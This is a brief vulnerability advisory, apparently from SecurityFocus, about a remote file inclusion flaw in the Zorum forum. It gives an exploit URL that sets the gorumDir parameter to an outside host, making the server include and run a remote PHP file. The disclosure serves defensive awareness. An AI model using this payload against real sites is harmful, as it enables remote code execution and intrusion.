PHPOutsourcing Zorum Remote Include Command Execution Vulnerability

The following exploit was contributed by MGhz <magas@mail.lt>:

http://[target]/[forum_dir]/include.php?gorumDir=http://example.com/
-->
include http://example.com/group.php on remote server


 

Privacy Statement
Copyright 2010, SecurityFocus